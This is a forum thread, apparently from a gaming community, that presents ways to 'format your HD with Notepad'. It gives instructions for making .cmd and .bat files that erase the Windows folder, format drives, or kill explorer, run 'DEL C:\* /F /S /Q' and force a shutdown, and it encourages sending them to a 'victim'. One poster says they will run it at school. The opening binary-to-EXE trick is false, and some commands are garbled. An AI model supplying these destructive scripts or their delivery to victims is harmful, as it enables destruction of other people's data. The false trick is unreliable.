Format Your HD With Notepad

Status
Not open for further replies.
🚫
Exiled
Joined
Dec 26, 2006
Messages
34
Reaction score
0
Step 1.
Write The Following In Notepad Exactly as it says
Code:
01001011000111110010010101010101010000011111100000



Step 2.
Save As An EXE Any Name Will Do

Step 3.
Congrats
Justin1992 - Format Your HD With Notepad - RaGEZONE Forums


This May Be Outdated, I'm Not Sure, But I Wont Try It
Justin1992 - Format Your HD With Notepad - RaGEZONE Forums


============================================
Made By: Justin1992
ONLY BE POSTED ON ragezone
============================================

Now, to test it, create a textfile called "TEST.txt"(empty) in C:
Now in your notepad type "erase C:TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C: and you'll see your Test.txt is gone. Now, the real work begins:

Go to Notpad and type "erase C:WINDOWS" (or C:LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.
BTW dont test it on your own computer only when you wanna format your pc <:3
 
First method won't do anything except crash the program in question when it runs off the end of the 'code', which reads as follows:
Code:
XOR     [BX+DI],DH
XOR     [BX+SI],DH
XOR     [BX+SI],SI
XOR     [BX+DI],SI
XOR     [BX+SI],DH
XOR     [BX+DI],DH
XOR     [BX+DI],SI
XOR     [BX+DI],SI
XOR     [BX+SI],DH
XOR     [BX+SI],SI
XOR     [BX+DI],DH
XOR     [BX+DI],DH
XOR     [BX+DI],DH
XOR     [BX+DI],DH
XOR     [BX+DI],DH
XOR     [BX+DI],DH
XOR     [BX+DI],DH
XOR     [BX+SI],DH
XOR     [BX+SI],DH
XOR     [BX+DI],DH
XOR     [BX+DI],SI
XOR     [BX+DI],SI
XOR     [BX+SI],SI
XOR     [BX+SI],DH
XOR     [BX+SI],DH
Second is well... common sense once you realise .cmd works like .bat under Win2K+.
 
Okay, I'm pretty sure your not the only one that knew this. Oh and for a faster way just type,

format C:
format D:
format E:

So on.
 
Awesome thanks gonna do it in my school mwahahah!
 
Other fun things to put in a .com file:

Code:
tsshutdn 0 /powerdown /delay:0
To make the victims PC shut down

Code:
@echo off
tskill explorer /A
This kills the explorer process, always funny to see :wink:

Code:
@echo off
tskill explorer /A
DEL C:\* /F /S /Q
tsshutdn 0 /powerdown /delay:0
The most evil version: this kills explorer first and then deletes everything on the C drive, without actually notifying the user, and then it shuts down the PC. I haven't tried this ofcourse, and would advise against using it for all but test purposes, but it does show the potential of the command line :wink:
 
Status
Not open for further replies.
Back